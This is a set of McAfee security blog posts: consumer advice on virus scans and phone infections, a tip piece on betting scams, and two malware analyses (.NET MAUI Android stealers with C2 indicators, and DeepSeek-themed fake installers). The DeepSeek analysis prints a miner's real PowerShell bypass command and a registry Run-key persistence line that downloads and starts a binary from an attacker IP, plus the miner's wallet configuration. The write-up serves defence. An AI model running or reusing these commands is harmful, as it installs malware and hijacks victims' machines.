    Antivirus products for Android devices abound due to this system’s open-source foundation. However, due to Apple’s strong security model, which includes app sandboxing, traditional viruses are rare on iPhones and iPads. However, these devices are not immune to all threats. You can still fall victim to phishing scams, insecure Wi-Fi networks, and malicious configuration profiles. Signs of a compromise can include unusual calendar events, frequent browser redirects, or unexpected pop-ups.

    Apple devices, however, closed platform doesn’t easily accommodate third-party applications, especially unvetted ones. You will most likely find robust and verified antivirus scanning tools on Apple’s official app store.

    Scanning files and attachments safely

    Before you open any downloaded file or email attachment, it’s wise to check it for threats. To perform a targeted virus scan on a single file, simply right-click the file in Windows Explorer or macOS Finder and select the “Scan” option from the context menu to run the integrated virus checker on a suspicious item.

    For an added layer of security, especially involving files from unknown sources, you can use a web-based file-checking service that scans for malware. These websites let you upload a file, which is then analyzed by multiple antivirus engines. Many security-conscious email clients also automatically scan incoming attachments, but a manual scan provides crucial, final-line defense before execution.

    3. Review scan results and take action

    Once the scan is complete, the tool will display a report of any threats it found, including the name of the malware and the location of the infected file. If your antivirus software alerts you to a threat, don’t panic—it means the program is doing its job.

    The first and most critical step is to follow the software’s instructions. It might direct you to quarantine the malicious file to isolate the file in a secure vault where it can no longer cause harm. You can then review the details of the threat provided by your virus scanner and choose to delete the file permanently, which is usually the safest option.

    After the threat is handled, ensure your antivirus software and operating system are fully updated. Finally, run a new, full system virus scan to confirm that all traces of the infection have been eliminated. Regularly backing up your important data to an external drive or cloud service can also be a lifesaver in the event of a serious infection.

    4. Schedule an automatic scan for continuous protection

    The most effective way to maintain your device’s security is to automate your defenses. A quality antivirus suite allows you to easily schedule a regular virus scan so you’re always protected without having to do it manually. A daily quick scan is a great habit for any user; it’s fast and checks the most vulnerable parts of your system. Most antivirus products regularly scan your computer or device in the background, so a manual scan is only needed if you notice something dubious, like crashes or excessive pop-ups. You can also set regular scans on your schedule, but a weekly full scan is ideal.

    Final thoughts

    These days, it is essential to stay ahead of the wide variety of continuously evolving cyberthreats. Your first line of defense against these threats is to regularly conduct a virus scan. You can choose among the many free yet limited-time products or comprehensive, cloud-based solutions.

    While many free versions legitimately perform their intended function, it’s critical to be cautious as these are more often baseline solutions while some are malware in disguise. They also lack the continuous, real-time protection necessary to block threats proactively.

    A better option is to invest in verified, trustworthy, and all-in-one antivirus products like McAfee+ that, aside from its accurate virus scanning tool, also offers a firewall, a virtual private network, and identity protection. For complete peace of mind, upgrading to a paid solution like McAfee Total Protection is essential for proactively safeguarding your devices and data in real-time, 24/7.

    The post How to Scan for Viruses and Confirm Your Device Is Safe appeared first on McAfee Blog.

    7 Signs Your Phone Is Infected With a Virus

    By: McAfee

    We use our smartphones for everything under the sun, from work-related communication to online shopping, banking transactions, and social media. For this reason, our phones store a lot of personal data, including contacts, account details, and bank account logins

    High online usage also makes your devices vulnerable to viruses, a type of malware that replicate themselves and spread throughout the entire system. They can affect your phone’s performance or, worse, compromise your sensitive information so that hackers can benefit monetarily.

    In this article, we will give you a rundown of viruses that can infect your phone and how you can identify and eliminate them. We will also provide some tips for protecting your phone from viruses in the first place.

    Phone Virus on iOS vs Android

    iPhones and Android devices run on different operating systems, hence differences in how they resist viruses and how these affect each system.

    While iOS hacks can still happen, Apple’s operating system is reputed to be highly resistant to viruses because of its design. By restricting interactions between apps, Apple’s operating system limits the movement of a virus across the device. However, if you jailbreak your iPhone or iPad to unlock other capabilities or install third-party apps, then the security restrictions set by Apple’s OS won’t work. This exposes your iPhone and you to vulnerabilities that cybercriminals can exploit. 

    Android phones, while also designed with cybersecurity in mind, rely on open-source code, making them an easier target for hackers. Additionally, giving users the capability to install third-party apps from alternative app stores, such as the Amazon or Samsung Galaxy app stores, makes Android devices open to viruses. 

    Types of phone viruses

    Cybercriminals today are sophisticated and can launch a variety of cyberattacks on your smartphone. Some viruses that can infect your phone include: 

    • Malware: Malware encompasses programs that steal your information or take control of your device without your permission.
    • Adware: These are ads that can access information on your device if you click on them.
    • Ransomware: These prevent you from accessing your phone again unless you pay a ransom to the hacker. The hacker may also use your personal data, such as pictures, as blackmail.
    • Spyware: This tracks your browsing activity, then steals your data or affects your phone’s performance.
    • Trojan: Aptly named, this type of virus hides inside an app to take control of or affect your phone and data.

    Common ways phones get infected

    Ultimately, contracting a virus on your phone or computer comes down to your browsing and downloading habits. These are the most common ways it could happen:

    • Clicking on links or attachments from unverified sources, which are mostly distributed through emails and text messages
    • Clicking on seemingly innocent ads that take you to an unsecured webpage or download mobile malware to your device
    • Visiting questionable websites, often ignoring security warnings
    • Downloading malicious apps from unverified sources, usually outside the Apple App Store or Google Play Store
    • Connecting to an unsecured internet connection, like public wi-fi

    7 signs your phone has a virus

    Now that you know how your phone could be infected by a virus, look out for these seven signs that occur when malicious software is present:

    1. You see random pop-up ads or new apps

    Most pop-up ads don’t carry viruses but are only used as marketing tools. However, if you find yourself closing pop-up ads more often than usual, it might indicate a virus on your phone. These ads might be coming from apps in your library that you didn’t install. In this case, uninstall them immediately as they tend to carry malware that’s activated when the app is opened or used.

    2. Your device feels physically hot

    When you accidentally download apps that contain malware, your device has to work harder to continue functioning. Since your phone isn’t built to support malware, there is a good chance it will overheat.

    3. Random messages are sent to your contacts

    If your contacts receive unsolicited scam emails or messages on social media from your account, especially those containing suspicious links, a virus may have accessed your contact list. It’s best to let all the recipients know that your phone has been hacked so that they don’t download any malware themselves or forward those links to anybody else.

    4. The device responds slowly

    An unusually slow-performing device is a hint of suspicious activity on your phone. The device may be slowing down because it is working harder to support the downloaded virus. Alternatively, unfamiliar apps might be taking up storage space and running background tasks, causing your phone to run more slowly.

    5. You find fraudulent charges on your accounts

    Are you finding credit card transactions in your banking statements that you don’t recognize? It could be an unfamiliar app or malware making purchases through your account without your knowledge.

    6. The phone uses excess data

    A sudden rise in your data usage or phone bill can be suspicious. A virus might be running background processes or using your internet connection to transfer data out of your device for malicious purposes.

    7. Your battery drains quickly

    An unusually quick battery drain may also cause concern. Your phone will be trying to meet the energy requirements of the virus, so this problem is likely to persist for as long as the virus is on the device.

    How to Detect and Remove a Virus on Your Phone

    You may have an inkling that a virus resides in your phone, but the only way to be sure is to check. An easy way to do this is by downloading a trustworthy antivirus app that will prevent suspicious apps from attaching themselves to your phone and secure any public connections you might be using.

    Another way to check your phone is to follow these step-by-step processes, depending on the type of phone you use:

    How to check your iPhone for a virus

    1. Check battery usage: Go to Settings > Battery. Scroll down to see the battery usage by app. If you see an app you don’t recognize or an app with unusually high usage, it could be a sign of malicious activity.
    2. Review app list and storage: Carefully examine all the apps installed on your phone. If you find an app that you don’t remember downloading, it could be malware. Uninstall it immediately. Also, check Settings > General > iPhone Storage for any strange or unexpected data usage by apps.
    3. Monitor data consumption: Navigate to Settings > Cellular. Review the data usage for each app. A virus on your phone can consume large amounts of data by running in the background and communicating with a hacker’s server.
    4. Look for jailbreak evidence: If you didn’t jailbreak your phone but see apps like Cydia or Sileo, it’s a major red flag. Someone with physical access to your phone may have jailbroken it to install spyware or other malware.
    5. Run an iOS security app: For peace of mind and a thorough check, use a reputable security application to help you scan for system threats, secure your wi-fi connection, and help identify risks that are not immediately obvious.

    How to check for a virus on an Android device

    1. Utilize Google Play Protect: This Android’s built-in malware protection is your first line of defense to know if your phone has a virus. Open the Google Play Store app, tap on your profile icon, and select Play Protect. Tap “Scan” to check your apps for harmful behavior.
    2. Boot into safe mode: If your phone is lagging or crashing, restarting in Safe Mode can help. Press and hold the power button, then tap and hold the “Power off” option until the “Reboot to safe mode” prompt appears. In Safe Mode, all third-party apps are disabled. If the issues disappear, a recently installed app is likely the culprit. You can then uninstall suspicious apps one by one.
    3. Review app permissions: Go to Settings > Apps and check the permissions for each app. Is a simple game asking for access to your contacts and microphone? That’s a red flag. Revoke any permissions that seem unnecessary for an app’s function. This helps prevent spyware from collecting your data.
    4. Install a trusted antivirus app: For the most comprehensive protection, install a top-rated security app like McAfee Mobile Security. Running a full scan will detect and help you quarantine or remove malicious files and apps that built-in tools might miss, providing a clear path on how to clean your phone from a virus.

    How to remove a virus from your device

    Once you have determined that a virus is present on your iPhone or Android device, there are several things you can do. 

    • Download antivirus software or a mobile security app to help you locate existing viruses and malware. By identifying the exact problem, you know what to get rid of and how to protect your device in the future. 
    • Do a thorough sweep of your app library to make sure that whatever apps are on your phone were downloaded by you. Delete any apps that you’re unfamiliar with.
    • To protect your information, delete any sensitive text messages and clear history regularly from your mobile browsers. Empty the cache in your browsers and apps.
    • In some instances, you may need to reboot your smartphone to its original factory settings. This can lead to data loss, so be sure to back up important documents to the cloud.
    • Create strong passwords for all your accounts after cleaning up your phone, and protect them using a password manager. This tool uses the most robust encryption algorithms so only you have access to your information.

    7 tips to protect your phone from viruses

    Caring for your phone is a vital practice to protect your information. Follow these tips to stay safe online and help reduce the risk of your phone getting a virus. 

    • Only download apps from a trusted source, i.e., the app store or other verified stores. Before installing, read the app reviews and understand how the app intends to use your data.
    • Set up strong, unique passwords for your accounts instead of reusing the same or similar passwords. This prevents a domino effect in case one of the accounts is compromised.
    • Think twice before you click on a link. If a link looks suspicious, trust your gut! Avoid clicking on it until you have more information about its trustworthiness. These links can be found across messaging services and are often part of phishing scams. 
    • Clear your cache periodically. Scan your browsing history to get rid of any links that seem suspicious. 
    • Avoid saving login information on your browsers and log out when you’re not using a particular browser. Although this is a convenience trade-off, it’s harder for malware to access accounts you’re not logged into during the attack.
    • Update your operating system and apps frequently. Regular updates build upon previous security features. Sometimes, these updates contain security patches created in response to specific threats in prior versions. 
    • Don’t give an app all the permissions it asks for. Instead, you can choose to give it access to certain data only when required. Minimizing an application’s access to your information keeps you safer.
    • Avoid using unsecure internet connections such as public wi-fi. If it is unavoidable, it is ideal to have a secure virtual private network that encrypts your data to make unsecured networks safe to use.

    Final Thoughts

    You have come to rely heavily on your smartphones for many online activities and storage of much of your personal data, including contacts, account details, and bank account logins. This puts your devices at high risk of being infected by viruses that impact not just your phone’s performance but also of being compromised by cybercriminals.

    To help you protect your device and personal information, the award-winning McAfee Mobile Security solution regularly scans for threats transmitted through suspicious links in text messages, emails, or downloads, and blocks them in real time. McAfee Mobile Security is a reputable security application that filters risky emails and phishing attempts, so your inbox stays secure while providing a secure virtual private network. It is also capable of spotting deepfake videos, so you can stay ahead of misinformation. With McAfee, you can rest easy knowing your mobile phone is protected from the latest cyberthreats.

    The post 7 Signs Your Phone Is Infected With a Virus appeared first on McAfee Blog.

    New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI 

    By: McAfee Labs

    Authored by Dexter Shin 

    Summary 

    Cybercriminals are constantly evolving their techniques to bypass security measures. Recently, the McAfee Mobile Research Team discovered malware campaigns abusing .NET MAUI, a cross-platform development framework, to evade detection. These threats disguise themselves as legitimate apps, targeting users to steal sensitive information. This blog highlights how these malware operate, their evasion techniques, and key recommendations for staying protected. 

    Background 

    In recent years, cross-platform mobile development frameworks have grown in popularity. Many developers use tools like Flutter and React Native to build apps that work on both Android and iOS. Among these tools, Microsoft provides a framework based on C#, called Xamarin. Since Xamarin is well-known, cybercriminals sometimes use it to develop malware. We have previously found malware related to this framework. However, Microsoft ended support for Xamarin in May 2024 and introduced .NET MAUI as its replacement.

    Unlike Xamarin, .NET MAUI expands platform support beyond mobile to include Windows and macOS. It also runs on .NET 6+, replacing the older .NET Standard, and introduces performance optimizations with a lightweight handler-based architecture instead of custom renderers.

    As technology evolves, cybercriminals adapt as well. Reflecting this trend, we recently discovered new Android malware campaigns developed using .NET MAUI. These Apps have their core functionalities written entirely in C# and stored as blob binaries. This means that unlike traditional Android apps, their functionalities do not exist in DEX files or native libraries. However, many antivirus solutions focus on analyzing these components to detect malicious behavior. As a result, .NET MAUI can act as a type of packer, allowing malware to evade detection and remain active on devices for a long time.

    In the following sections, we will introduce two Android malware campaigns that use .NET MAUI to evade detection. These threats disguise themselves as legitimate services to steal sensitive information from users. We will explore how they operate and why they pose a significant risk to mobile security.

    Am I protected? 

    McAfee Mobile Security already detects all of these apps as Android/FakeApp and protects users from these threats. For more information about our Mobile Product, visit McAfee Mobile Security. 

    Technical Findings  

    While we found multiple versions of these malicious apps, the following two examples are used to demonstrate how they evade detection. 

    First off, where are users finding these malicious apps? Often, these apps are distributed through unofficial app stores. Users are typically directed to such stores by clicking on phishing links made available by untrusted sources on messaging groups or text messages. This is why we recommend at McAfee that users avoid clicking on untrusted links. 

    Example 1: Fake Bank App 

    The first fake app we found disguises itself as IndusInd Bank, specifically targeting Indian users. When a user launches the app, it prompts them to input personal and financial details, including their name, phone number, email, date of birth, and banking information. Once the user submits this data, it is immediately sent to the attacker’s C2 (Command and Control) server. 

     

    Figure 1. Fake IndusInd Bank app’s screen requesting user information

    As mentioned earlier, this is not a traditional Android malware. Unlike typical malicious apps, there are no obvious traces of harmful code in the Java or native code. Instead, the malicious code is hidden within blob files located inside the assemblies directory. 

     

    Figure 2. Blob contains malicious code 

     The following code snippet reveals how the app collects and transmits user data to the C2 server. Based on the code, the app structures the required information as parameters before sending it to the C2 server. 

    Figure 3. C# code responsible for stealing user data and sending it to the C2 server   

    Example 2: Fake SNS App  

    In contrast to the first fake app, this second malware is even more difficult for security software to analyze. It specifically targets Chinese-speaking users and attempts to steal contacts, SMS messages, and photos from their devices. In China, where access to the Google Play Store is restricted, such apps are often distributed through third-party websites or alternative app stores. This allows attackers to spread their malware more easily, especially in regions with limited access to official app stores. 

    Figure 4. Distribution site and fake X app targeting Chinese-speaking users 

    One of the key techniques this malware uses to remain undetected is multi-stage dynamic loading. Instead of directly embedding its malicious payload in an easily accessible format, it encrypts and loads its DEX files in three separate stages, making analysis significantly more difficult. 

    In the first stage, the app’s main activity, defined in AndroidManifest.xml, decrypts an XOR-encrypted file and loads it dynamically. This initial file acts as a loader for the next stage. In the second stage, the dynamically loaded file decrypts another AES-encrypted file and loads it. This second stage still does not reveal the core malicious behavior but serves as another layer of obfuscation. Finally, in the third stage, the decrypted file contains code related to the .NET MAUI framework, which is then loaded to execute the main payload. 

    Figure 5. Multi-stage dynamic loading 

    The main payload is ultimately hidden within the C# code. When the user interacts with the app, such as pressing a button, the malware silently steals their data and sends it to the C2 server. 


    Figure 6. C# code responsible for stealing images, contacts, and SMS data 

    Beyond multi-stage dynamic loading, this malware also employs additional tricks to make analysis more difficult. One technique is manipulating the AndroidManifest.xml file by adding an excessive number of unnecessary permissions. These permissions include large amounts of meaningless, randomly generated strings, which can cause errors in certain analysis tools. This tactic helps the malware evade detection by disrupting automated scanners and static analysis. 

     

    Figure 7. AndroidManifest.xml file with excessive random permissions 

    Another key technique is encrypted socket communication. Instead of using standard HTTP requests, which are easier to intercept, the malware relies on TCP socket connections to transmit data. This approach makes it difficult for traditional HTTP proxy tools to capture network traffic. Additionally, the malware encrypts the data before sending it, meaning that even if the packets are intercepted, their contents remain unreadable. 

    One more important aspect to note is that this malware adopts various themes to attract users. In addition to the fake X app, we also discovered several dating apps that use the same techniques. These apps had different background images but shared the same structure and functionality, indicating that they were likely created by the same developer as the fake X app. The continuous emergence of similar apps suggests that this malware is being widely distributed among Chinese-speaking users. 

     

    Figure 8. Various fake apps using the same technique 

     

    Recommendations and Conclusion 

    The rise of .NET MAUI-based malware highlights how cybercriminals are evolving their techniques to avoid detection. Some of the techniques described include:  

    • hiding code blobs within assemblies 
    • multi-stage dynamic loading 
    • encrypted communications 
    • excessive obfuscation 

    With these evasion techniques, the threats can remain hidden for long periods, making analysis and detection significantly more challenging. Furthermore, the discovery of multiple variants using the same core techniques suggests that this type of malware is becoming increasingly common.  

    Users should always be cautious when downloading and installing apps from unofficial sources, as these platforms are often exploited by attackers to distribute malware. This is especially concerning in countries like China, where access to official app stores is restricted, making users more vulnerable to such threats. 

    To keep up with the rapid evolution of cybercriminal tactics, users are strongly advised to install security software on their devices and keep it up to date at all times. Staying vigilant and ensuring that security measures are in place can help protect against emerging threats. By using McAfee Mobile Security, users can enhance their device protection and detect threats related to this type of malware in real-time. 

     

    Glossary of Terms 

     

    Indicators of Compromise (IOCs) 

    APKs: 

     

    C2: 

    • tcp[://]120.27.233.135:1833 
    • https[://]onlinedeskapi.com 

    The post New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI  appeared first on McAfee Blog.

    How to Protect Yourself from March Madness Scams

    By: McAfee

    It’s the month of top seeds, big upsets, and Cinderella runs by the underdogs. With March Madness basketball cranking up, a fair share of online betting will be sure to follow—along with online betting scams. 

    Since a U.S. Supreme Court ruling in 2018, individual states can determine their own laws for sports betting. Soon after, states leaped at the opportunity to legalize it in some form or other. Today, nearly 40 states and the District of Columbia have “live and legal” sports betting, meaning that people can bet on single-game sports through a retail or online sportsbook or a combination of the two in their state. 

    And it has made billions of dollars for the government.

    If you’re a sports fan, this news has probably been hard to miss. Or at least the outcome of it all has been hard to miss. Commercials and signage in and around games promote several major online betting platforms. Ads have naturally made their way online too, complete with all kinds of promo offers to encourage people to get in on the action. However, that’s also opened the door for scammers who’re looking to take advantage of people looking to make a bet online, according to the Better Business Bureau (BBB). Often through shady or outright phony betting sites. 

    Let’s take a look at the online sports betting landscape, some of the scams that are cropping up, and some things you can do to make a safer bet this March or any time.  

    Can I bet on sports in my state, and how? 

    Among the 30 states that have “live and legal” sports betting, 19 offer online betting, a number that will likely grow given various state legislation that’s either been introduced or will be introduced soon. 

    If you’re curious about what’s available in your state, this interactive map shows the status of sports betting on a state-by-state level. Further, clicking on an individual state on the map will give you yet more specifics, such as the names of retail sportsbooks and online betting services that are legal in the state. For anyone looking to place a bet, this is a good place to start. It’s also helpful for people who are looking to get into online sports betting for the first time, as this is the sort of homework that the BBB advises people to do before placing a sports bet online. In their words, you can consider these sportsbooks to be “white-labeled” by your state’s gaming commission.

     

    However, the BBB stresses that people should be aware that the terms and conditions associated with online sports betting will vary from service to service, as will the promotions that they offer. The BBB accordingly advises people to closely read these terms, conditions and offers. For one, “Gambling companies can restrict a user’s activity,” meaning that they can freeze accounts and the funds associated with them based on their terms and conditions. Also, the BBB cautions people about those promo offers that are often heavily advertised, “[L]ike any sales pitch, these can be deceptive. Be sure to read the fine print carefully.” 

    Scammers and online betting 

    Where do scammers enter the mix? The BBB points to the rise of consumer complaints around bogus betting sites: 

    “You place a bet, and, at first, everything seems normal. But as soon as you try to cash out your winnings, you find you can’t withdraw a cent. Scammers will make up various excuses. For example, they may claim technical issues or insist on additional identity verification. In other cases, they may require you to deposit even more money before you can withdraw your winnings. Whatever you do, you’ll never be able to get your money off the site. And any personal information you shared is now in the hands of scam artists.” 

    If there’s a good reason you should stick to the “white labeled” sites that are approved by your state’s gaming commission, this is it. Take a pass on any online ads that promote betting sites, particularly if they roll out big and almost too-good-to-be-true offers. These may lead you to shady or bogus sites. Instead, visit the ones that are approved in your state by typing in their address directly into your browser. 

    Ready to place your bet? Keep these things in mind. 

    In addition to what we mentioned above, there are several other things you can do to make your betting safer. 

    1) Check the rep of the service.

    In addition to choosing a state-approved option, check out the organization’s BBB listing at BBB.org. Here you can get a snapshot of customer ratings, complaints registered against the organization, and the organization’s response to the complaints, along with its BBB rating, if it has one. Doing a little reading here can be enlightening, giving you a sense of what issues arise and how the organization has historically addressed them. For example, you may see a common complaint and how it’s commonly resolved. You may also see where the organization has simply chosen not to respond, all of which can shape your decision whether to bet with them or not. 

    2) Use a secure payment method other than your debit card.

    Credit cards are a good way to go. One reason why is the Fair Credit Billing Act, which offers protection against fraudulent charges on credit cards by giving you the right to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Your credit card companies may have their own policies that improve upon the Fair Credit Billing Act as well. Debit cards don’t get the same protection under the Act. 

    3) Get online protection.

    Comprehensive online protection software will defend you against the latest virus, malware, spyware, and ransomware attacks plus further protect your privacy and identity. In addition to this, it can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who may try to force their way into your accounts. And, specific to betting sites, online protection can help prevent you from clicking links to known or suspected malicious sites. 

    Make the safe(r) bet 

    With online betting cropping up in more and more states for more and more people, awareness of how it works and how scammers have set up their presence within it becomes increasingly important. Research is key, such as knowing who the state-approved sportsbooks and services are, what types of betting are allowed, and where. By sticking to these white-label offerings and reading the fine print in terms, conditions, and promo offers, people can make online betting safer and more enjoyable. 

    Editor’s Note: If gambling is a problem for you or someone you know, you can seek assistance from a qualified service or professional. Several states have their own helplines, and nationally you can reach out to resources like http://www.gamblersanonymous.org/ or https://www.ncpgambling.org/help-treatment/

    The post How to Protect Yourself from March Madness Scams appeared first on McAfee Blog.

    Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users

    By: McAfee Labs

    Authored by Aayush Tyagi and M, Mohanasundaram 

    *Bold = Term Defined in Appendix

    In this blog, we discuss how malware authors recently utilized a popular new trend to entice unsuspecting users into installing malware. This blog is meant as a reminder to stay cautious during a hype cycle. Its a common trap and pitfall for unassuming consumers. 

    Background

    Figure 1: DeepSeek Google Search Trend from 1st January to 7th March 

    Malware creators frequently exploit trending search terms through hashtags and SEO manipulation to boost visibility and climb search rankings. This tactic, known as SEO poisoning, helps drive traffic to malicious sites, increasing downloads or earning rewards through affiliate programs. Recently, “AI” (Artificial Intelligence) has been one of the most popular keywords leveraged in these scams. Earlier this year, “DeepSeek” also gained traction, even surpassing “Nvidia” at its peak in search interest.

    Let’s look at how we got here. Artificial Intelligence (AI) tools are transforming the world at an unprecedented pace, right before our eyes. In recent years, we’ve witnessed remarkable advancements in Generative AI, from the development of highly successful frontier of LLM’s (Large Language Models) such as ChatGPT, Gemini, LLaMA, Grok, etc., to their applications as coding assistants (GitHub Co-pilot or Tabnine), meeting assistants, and voice cloning software among the more popular ones.

    These tools are pervasive and easily available at your fingertips. In today’s world AI isn’t just a complicated term utilized by select organizations, it’s now adopted by every household in one way or another and is reshaping entire industries and economies.  

    With the good comes the bad, and unfortunately AI has enabled an accelerated ecosystem of scammers adopting these tools – examples are: 

    • creating deepfake videos for fake propaganda or fake advertising 
    • creating voice clones for “hey mum” scams or imposter scam voice mails from the IRS 
    • generating almost perfect-sounding text and emails for socially engineered scams leading to phishing 
    • generation of images to evoke sentiments resulting in charity scams 

    Besides the application of AI tools that empower scammers, there is the good old use case of piggybacking on popular news trends, where popular search terms are used to bait gullible users (read our blog on how game cracks are used as lures to deliver malware). One such popular news-worthy term that is being abused is DeepSeek, which McAfee discussed early this year. 

    Jumping on the DeepSeek-Hype Bandwagon  

    The launch of the DeepSeek-R1 model (by DeepSeek, a Chinese company) generated significant buzz. The model is claimed to have been innovated so that the cost of building and using the technology is a fraction1 of the cost compared to other Generative AI models such as OpenAI’s GPT-4o or Meta’s Llama 3.1. Moreover, the R1 model was released in January 2025 under an Open-Source license.  

    Within a few days of the release of the DeepSeek-R1 model, the Deepseek AI assistant—a chatbot for the R1 model—was launched on the Apple App Store and later the Google Play Store. In both app stores, Deepseek’s chatbot, which is an alternative to OpenAI’s ChatGPT, took the No. 1 spot and has been downloaded over 30 million times.  

    This stirred up the curiosity of many who wanted to experiment with the model. The interest spiked to a point where the DeepSeek website wasn’t available at times due to the sheer volume of people trying to set up accounts or download their app. This sense of excitement, anxiety, and impatience is exactly what scammers look for in their victims. It wasn’t shortly after the term went “viral” that scammers saw an opportunity and began cloaking malware disguised as DeepSeek. Various malware campaigns followed, which included Crypto-miners, fake installers, DeepSeek impersonator websites, and fake DeepSeek mobile apps.  

    First Things First – Am I Protected? 

    At McAfee Labs, we work hard to keep you safe, but staying informed is always a smart move. When navigating trending news stories, it’s important to stay cautious and take necessary precautions. We continuously track emerging threats across multiple platforms—including Windows, macOS, Android, iOS, and ChromeOS—to ensure our customers remain protected. While we do our part, don’t forget to do yours: enable Scam Protection, Web Protection, and Antivirus in your preferred security product.

    McAfee products offer advanced AI-powered protection across all tiers—Basic, Essential, Premium, Advanced, and Ultimate. Our AI-Suite includes features like AI-powered Antivirus, Text Scam Detection, Web Protection, VPN, and Identity Protection, providing comprehensive security.

    Check out McAfee Scam Detector, which enhances our ability to combat a wide range of scams and is included in our products at no extra cost.

    For more tips on avoiding scams and staying safe online, visit the McAfee Smart AI Hub at mcafee.ai. You can also explore the latest insights on the State of the Scamiverse on McAfee’s blog and stay up to date on scam prevention strategies.

    Together, we can outsmart scammers and make the internet safer for everyone.

     

    DeepSeek Malware Campaign Examples 

    In the rest of this article, we use simple examples to delve into more technical details for those seeking more analysis details. 

    McAfee Labs uncovered a variety of DeepSeek-themed malware campaigns attempting to exploit its popularity and target tech savvy users. Multiple malware families were able to distribute their latest variants under the false pretense of being DeepSeek software.  

    Figure 2: Attack Vector 

    Users encounter some threats while searching for information about DeepSeek AI on the internet. They encountered websites offering DeepSeek installers for different platforms, such as Android, Windows and Mac. McAfee Labs found a number of such installers were trojanized or just repackaged applications. We identified multiple instances of Keyloggers, Crypto miners, Password Stealers, and Trojan Downloaders being distributed as DeepSeek installers.  

    Example 1: Fake Installers and Fake Android Apps 

    Figure 3: DeepSeek Installers

    In Figure 3, we encountered fake installers, which distribute Third-Party software, such as winManager (highlighted in red) and Audacity (highlighted in blue).  

    In the simplest abuse of the DeepSeek name, certain affiliates were able to spike their partner downloads and get a commission based on pay-per-install partner programs. Rogue affiliates use this tactic to generate revenue through forced installations of partner programs.  

    Additionally similar software installers were also observed utilizing the DeepSeek Icon to appear more believable or alternatively use click ads and modify browser settings (such as modify the search engine) with the goal of generating additional ad revenue. 

    Figure 4: winManager (left) and Audacity (right)

    The Deepseek icon was also misused by multiple Android applications to deceive users into downloading unrelated apps, thereby increasing download counts and generating revenue. 

    Figure 5: Android files abusing DeepSeek’s Logo

     

    Example 2: Fake Captcha Page 

    We also encountered DeepSeek-Themed Fake-Captcha Pages. This isn’t new and has been a popular technique used as recently as 6 months ago by LummaStealer 

    Fake captcha – is a fake webpage, asking users to verify that they are human, but instead, tricks the user into downloading and executing malicious software. This malware can steal login credentials, browser information etc.  

    Figure6: Fake Captcha Page 

    In this instance, the website deepseekcaptcha[.]top pretends to offer a partnership program for content creators. They are utilizing the technique called ‘Brand Impersonation’, where they’re using DeepSeek’s Icons and color scheme to appear as the original website. 

    Figure 7: deepseekcaptcha[.]top

    Once the user registers for the program, they’re redirected to the fake captcha page. 

    Figure 8: Fake Captcha Page hosted on the website 

    Here, as shown above, to authenticate, the user is asked to open the verification window by pressing the Windows + R key and then pressing CTRL + V to verify their identity.  

    The user would observe a screen as shown in figure 9.  

    Figure 9: Windows Run panel after copying the CMD 

    On clicking ‘OK’, malware will be installed that can steal browser and financial information from the system. 

    McAfee’s Web Advisor protects against such threats. In this instance, the fake captcha page was blocked and marked as suspicious before it could be accessed. Even if you aren’t a McAfee customer, check out browser plugin for free.  

    Figure 10: McAfee blocking malicious URL 

     

    Example 3: Technical Analysis of a Crypto Miner 

    In this section we talk about a *Cryptominer malware that was masquerading as DeepSeek. By blocking this initial payload, we prevent a chain of events (Fig 11.) on the computer that would have led to reduced performance on the device and potentially expose your device to further infection attempts. 

    Some examples names used by the initial loader are were: 

    • DeepSeek-VL2.Developer.Edition.exe 
    • DeepSeek-R1.Leaked.Version.exe 
    • DeepSeek-VL2.ISO.exe 

    Figure 11: CryptoMiner KillChain

    Initial Execution 

    Once installed, this malware communicates with its *C&C (Command and Control) to download and execute a *PowerShell script. Figure 12 (a) and (b) show the malware connecting it’s IP address to download chunks of a script file which is then stored to the AppData\Roaming folder as installer.ps1  

    Figure 12(a): Sample connects to C&C IP Address 

    Figure 12(b): Installer.ps1 stored in Roaming folder

    Injection  

    An attempt is made to bypass system policies and launch the script 

    • /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File “C:\Users\admin\AppData\Roaming\installer.ps1 
    • The ‘installer.ps1’ contains malicious code which will be injected and executed using a technique called *Process Injection  (Figure 14) 
    • Figure 13 shows how the malware encodes this script to avoid detection 

    Figure 13: Base64 Encoded Malicious Code

    Figure 14: PowerShell code for Process Injection.

    *Persistence  

    Malware attempts to maintain persistence on the Victim’s computer.  

    • It executes reg.exe with the following command line (Fig 15) 
    • reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v WindowsUpdate /t REG_SZ /d “powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri 45[.]144[.]212[.]77:16000/client -OutFile C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe” /f 

     

    Figure 15: Creating Run Key entry to maintain persistence

    • This command retrieves a file named client.exe from the C2 server, saves it in the Programs\Startup as runps.exe, and executes it as its *Payload. The file runps.exe is identified as *XMRig mining software.  

    Payload 

    • To initiate the mining process, it connects to the same C2 server and downloads additional parameters.  

    Figure 16: HTTP response that contains additional parameters 

    [{“address”:”494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3″,”idle_threads”:90,”idle_time”:1,”password”:”x”,”pool”:”pool.hashvault.pro:443″,”task”:”FALLEN|NOTASK”,”threads”:40}] 

    • These are parameters used to identify the wallet address. 
    • The payload injects into Notepad.exe (a legitimate windows process) uses the downloaded parameters to start the mining process. 

    Figure 17: Notepad.exe being executed with additional parameters 

    • We can further understand malware’s behavior by analyzing the downloaded information.
        • –donate-level 2: The Donation level is set at 2%. I.e., 2% of the total mining time will be donated to XMRig developers.  
        • -o pool.hashvault.pro:443: This specifies the mining pool to connect to; pool.hashvault.pro (in this case) 
        • -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3: This is the wallet address where the mined cryptocurrency is sent.  
